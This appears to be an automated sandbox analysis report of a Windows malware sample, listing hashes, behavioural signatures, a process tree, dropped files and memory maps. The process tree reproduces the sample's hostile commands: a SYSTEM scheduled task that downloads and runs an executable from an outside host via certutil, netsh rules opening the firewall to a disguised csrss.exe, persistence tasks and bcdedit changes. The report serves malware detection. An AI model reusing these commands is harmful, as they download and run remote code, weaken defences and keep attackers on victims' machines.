Analysis
-
max time kernel
39s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 21:24
Static task
static1
Behavioral task
behavioral1
Sample
287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
Resource
win10v2004-20220414-en
General
-
Target
287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
-
Size
3.8MB
-
MD5
2d48cb04270279d2671002d34e14153a
-
SHA1
952c2fb3dc4557c49b0b91b3ee6a19083e455d81
-
SHA256
287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9
-
SHA512
aa83e36687809cb30efda459b3f510ef5878f01985b678bc7bfa7c5965fa99d9257ff270219a618e29920a8230ee8f074d96eaf04873223388e86af0be8ad62e
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 1492 created 2152 1492 svchost.exe 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 740 bcdedit.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2012 2152 WerFault.exe 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe 3456 1424 WerFault.exe 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3600 schtasks.exe 2076 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exepid process 2152 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe 2152 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe 1424 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe 1424 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exesvchost.exedescription pid process Token: SeDebugPrivilege 2152 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe Token: SeImpersonatePrivilege 2152 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe Token: SeTcbPrivilege 1492 svchost.exe Token: SeTcbPrivilege 1492 svchost.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
svchost.exe287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.execmd.exedescription pid process target process PID 1492 wrote to memory of 1424 1492 svchost.exe 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe PID 1492 wrote to memory of 1424 1492 svchost.exe 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe PID 1492 wrote to memory of 1424 1492 svchost.exe 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe PID 1424 wrote to memory of 4984 1424 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe cmd.exe PID 1424 wrote to memory of 4984 1424 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe cmd.exe PID 4984 wrote to memory of 960 4984 cmd.exe netsh.exe PID 4984 wrote to memory of 960 4984 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe"C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe"C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"3⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 7003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 7242⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2152 -ip 21521⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1424 -ip 14241⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
625KB
MD58f9b2bb661cd4f2b100430caa8f075d8
SHA1a18ed5630b6e51bfa316a72481b515d6cec91bb0
SHA256ecd79655fdb39b1e3f443578d5901b7abbe531537adb2d1d6484eb28976dd4fb
SHA512e93fc32fa0b13f17458d6cfbe4cd6a550f787b5ff566055224c4ebcb421c145a2fc187472b3ebe66b0666183fc5f02e09d88de712c8ca228ef5769c5ad7febf5
-
C:\Windows\rss\csrss.exeFilesize
872KB
MD5a324c441016f613796706d061589223e
SHA1e34e4d2b8af5a822d0d294a711ae3e0c24af4e5c
SHA256cf0e8f2ef5126008133c33e75c9d246774a5b71ac0baecbfe5b18f5ed146b9db
SHA5126d66ef7ca46909ab003a0a664010f6f7bd16dfaba27f69ef1af8ee8fabae2827f611aa2968cfdd16db15b4a2a8c14cc2845c4195f02bcabe3044bd7f72d68c8f
-
C:\Windows\rss\csrss.exeFilesize
709KB
MD58d851edb7da3d96877f02cdfbfe1fc26
SHA1f17bedaf06b5a79c9c53123b8d4b5801224dc268
SHA25602ea309f2d05409e292c5c712d0d405e72641403eb8c0592728ca926fc10d93a
SHA512fab5b650c33dca0b500b0c1de8e2f80b676459ad452f2047cd830efbfde4581484a8349c66ef03827ab09bc3326c2aefdb12d1d2a79d406645ff0928b391544d
-
memory/708-147-0x0000000000000000-mapping.dmp
-
memory/740-149-0x0000000000000000-mapping.dmp
-
memory/960-135-0x0000000000000000-mapping.dmp
-
memory/1424-136-0x000000000291D000-0x0000000002CC3000-memory.dmpFilesize
3.6MB
-
memory/1424-137-0x0000000000400000-0x0000000000BDA000-memory.dmpFilesize
7.9MB
-
memory/1424-133-0x0000000000000000-mapping.dmp
-
memory/1816-139-0x0000000000000000-mapping.dmp
-
memory/1868-140-0x0000000000000000-mapping.dmp
-
memory/1868-143-0x0000000002D00000-0x00000000030A6000-memory.dmpFilesize
3.6MB
-
memory/1868-145-0x0000000000400000-0x0000000000BDA000-memory.dmpFilesize
7.9MB
-
memory/2076-144-0x0000000000000000-mapping.dmp
-
memory/2152-130-0x00000000028B9000-0x0000000002C5F000-memory.dmpFilesize
3.6MB
-
memory/2152-132-0x0000000000400000-0x0000000000BDA000-memory.dmpFilesize
7.9MB
-
memory/2152-131-0x0000000002C60000-0x0000000003355000-memory.dmpFilesize
7.0MB
-
memory/3600-146-0x0000000000000000-mapping.dmp
-
memory/3748-138-0x0000000000000000-mapping.dmp
-
memory/4984-134-0x0000000000000000-mapping.dmp